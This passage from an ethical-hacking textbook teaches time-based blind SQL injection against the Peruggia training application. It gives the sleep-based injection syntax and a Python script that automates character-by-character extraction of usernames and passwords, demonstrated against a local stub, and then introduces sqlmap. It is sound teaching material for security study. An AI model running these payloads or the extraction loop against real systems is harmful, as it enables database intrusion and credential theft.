Ethical Hacking and Penetration Testing Guide
Web Hacking
From this screenshot, we can conclude that the password column exists in the database.
Extracting Data from Columns
Finally, we will enumerate the data present in the columns, again one character at a time. Along with the password column there is also a username column, so we will enumerate the username; the same method works for the password. The syntax is as follows:
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
Here column_name and table_name are placeholders for the column and table you are reading from. The query takes the first character (mid(...,1,1)) of the first row (limit 0,1), compares it with 'a', and delays the response by 5 seconds only when they match; change the second argument of mid() to move to the next character and the compared letter to test another candidate.
From this screenshot, you can see that our first query succeeded (the response was delayed by about 5 seconds), so the first character of the username is "a"; the second query, which tested the second character against "a", returned immediately, so that character is not "a". Repeating this for every position and every candidate character extracts the entire username, "admin". I will leave extracting the password to you.
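The loop described above, automated, as an added example that is not code from the book. It generalizes the manual procedure: for each position it walks a candidate character set, sends the time-based payload, and treats a slow response as TRUE. Because it has to run offline, the vulnerable Peruggia page is replaced by a constructed fake_fetch() that parses the injected pic_id value and sleeps only when the condition would be true; the table name users and the password value are assumptions, and the 5-second sleep is scaled down so the demo finishes quickly.

```python
import re
import time
import urllib.parse
from typing import Callable

# Constructed stand-in for the vulnerable Peruggia comment page. It is not the
# real application: one fake row, and an emulation of MySQL's
# if(cond, sleep(N), 1) applied to whatever is injected into the last pic_id.
FAKE_ROWS = [{"username": "admin", "password": "s3cret"}]  # password is made up
SLEEP_SECONDS = 0.02  # the page uses sleep(5); scaled down for speed

PAYLOAD_RE = re.compile(
    r"and if\(\(select mid\((\w+),(\d+),1\) from (\w+) limit (\d+),1\)"
    r"='(.)',sleep\(\d+\),1\)--",
    re.IGNORECASE,
)


def fake_fetch(url: str) -> str:
    """Emulate the server: delay only when the injected condition is true."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    injected = query["pic_id"][-1]  # PHP keeps the last duplicate parameter
    match = PAYLOAD_RE.search(injected)
    if match:
        column, pos, _table, row, guess = match.groups()
        value = FAKE_ROWS[int(row)][column]
        # mid() past the end of the string returns '', which matches nothing;
        # with MySQL's default collation the comparison is case-insensitive.
        if value[int(pos) - 1:int(pos)].lower() == guess.lower():
            time.sleep(SLEEP_SECONDS)  # the number inside sleep() is ignored here
    return "<html>comment page</html>"


BASE_URL = ("http://192.168.75.147/peruggia/index.php"
            "?action=comment&pic_id=13&pic_id=13")
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"  # lowercase: see note below


def condition_is_true(fetch: Callable[[str], str], payload: str,
                      sleep_seconds: float = SLEEP_SECONDS) -> bool:
    """Time one request; slower than half the sleep means the condition held."""
    url = BASE_URL + urllib.parse.quote(" " + payload)
    start = time.monotonic()
    fetch(url)
    return time.monotonic() - start >= sleep_seconds / 2


def extract_field(fetch: Callable[[str], str], column: str,
                  table: str = "users",  # assumed table name
                  row: int = 0, max_len: int = 64) -> str:
    """Recover one field character by character, as the text does by hand."""
    result = ""
    for pos in range(1, max_len + 1):
        for guess in CHARSET:
            payload = (f"and if((select mid({column},{pos},1) from {table} "
                       f"limit {row},1)='{guess}',sleep(5),1)--")
            if condition_is_true(fetch, payload):
                result += guess
                break
        else:
            break  # no candidate delayed: mid() returned '' and we hit the end
    return result


if __name__ == "__main__":
    for col in ("username", "password"):
        print(col, "=", extract_field(fake_fetch, col))
```

Two caveats a real run needs. With MySQL's default collation mid(...)='a' also matches 'A', so a lowercase charset is enough to find the value but not its case; compare ascii(mid(...)) or use binary to distinguish. And a slow network can make an innocent request look delayed, so confirm each hit with a second request and pick a threshold well above normal latency; sqlmap does the same job with a binary search over ascii() values instead of this linear scan.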
Automating SQL Injections with Sqlmap
We talked about many types of SQL injection vulnerabilities and how to exploit them. You might have realized by now that exploiting SQL injection by hand can be a very tedious task; therefore, a better option is to use an automated tool such as sqlmap.
Sqlmap is one of the best tools for exploiting SQL injection vulnerabilities. It supports many databases and helps us not only to enumerate and extract database contents but also to execute system commands. I will discuss the basics of sqlmap and leave the rest for you to explore, since it includes a huge list of functions that cannot all be explained here.
We will use the same vulnerable application that was used for demonstrating UNION-based and Boolean-based SQL injection.
Sqlmap can be found in the /pentest/database/sqlmap directory in BackTrack 5 R3; the path might differ depending on which version of BackTrack you are using. You can use the locate command to search for sqlmap. Once in the directory, execute the following command to launch the sqlmap help menu.